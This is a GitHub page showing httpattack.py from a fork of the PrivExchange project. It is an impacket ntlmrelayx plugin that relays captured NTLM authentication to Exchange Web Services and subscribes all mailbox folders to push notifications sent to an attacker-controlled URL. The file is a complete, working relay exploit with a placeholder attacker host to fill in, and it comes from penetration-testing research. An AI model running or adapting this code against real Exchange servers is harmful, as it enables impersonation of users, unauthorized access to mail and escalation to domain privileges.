forked from dirkjanm/PrivExchange
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathhttpattack.py
89 lines (83 loc) · 3.58 KB
/
httpattack.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# HTTP Attack Class
#
# Authors:
# Alberto Solino (@agsolino)
# Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
#
# Description:
# HTTP protocol relay attack
#
# ToDo:
#
import xml.etree.ElementTree as ET
from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
from impacket import LOG
# SOAP request for EWS
# Source: https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/subscribe-operation
# Credits: https://www.thezdi.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange
POST_BODY = '''<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
<soap:Header>
<t:RequestServerVersion Version="Exchange2013" />
</soap:Header>
<soap:Body >
<m:Subscribe>
<m:PushSubscriptionRequest SubscribeToAllFolders="true">
<t:EventTypes>
<t:EventType>NewMailEvent</t:EventType>
<t:EventType>ModifiedEvent</t:EventType>
<t:EventType>MovedEvent</t:EventType>
</t:EventTypes>
<t:StatusFrequency>1</t:StatusFrequency>
<t:URL>%s</t:URL>
</m:PushSubscriptionRequest>
</m:Subscribe>
</soap:Body>
</soap:Envelope>
'''
PROTOCOL_ATTACK_CLASS = "HTTPAttack"
class HTTPAttack(ProtocolAttack):
"""
This is a modified HTTPAttack which triggers authentication from EWS
"""
PLUGIN_NAMES = ["HTTP", "HTTPS"]
def run(self):
ews_url = "/EWS/Exchange.asmx"
headers = {"Content-type": "text/xml; charset=utf-8", "Accept": "text/xml","User-Agent": "ExchangeServicesClient/0.0.0.0","Translate": "F"}
# Replace with your attacker url!
attacker_url = 'http://dev.testsegment.local/myattackerurl/'
self.client.request("POST", ews_url, POST_BODY % attacker_url, headers)
res = self.client.getresponse()
LOG.debug('HTTP status: %d', res.status)
body = res.read()
LOG.debug('Body returned: %s', body)
if res.status == 200:
LOG.info('Exchange returned HTTP status 200 - authentication was OK')
# Parse XML with ElementTree
root = ET.fromstring(body)
code = None
for response in root.iter('{http://schemas.microsoft.com/exchange/services/2006/messages}ResponseCode'):
code = response.text
if not code:
LOG.error('Could not find response code element in body: %s', body)
return
if code == 'NoError':
LOG.info('API call was successful')
elif code == 'ErrorMissingEmailAddress':
LOG.error('The user you authenticated with does not have a mailbox associated. Try a different user.')
else:
LOG.error('Unknown error %s', code)
for errmsg in root.iter('{http://schemas.microsoft.com/exchange/services/2006/messages}ResponseMessages'):
LOG.error('Server returned: %s', errmsg.text)
elif res.status == 401:
LOG.error('Server returned HTTP status 401 - authentication failed')
else:
LOG.error('Server returned HTTP %d: %s', res.status, body)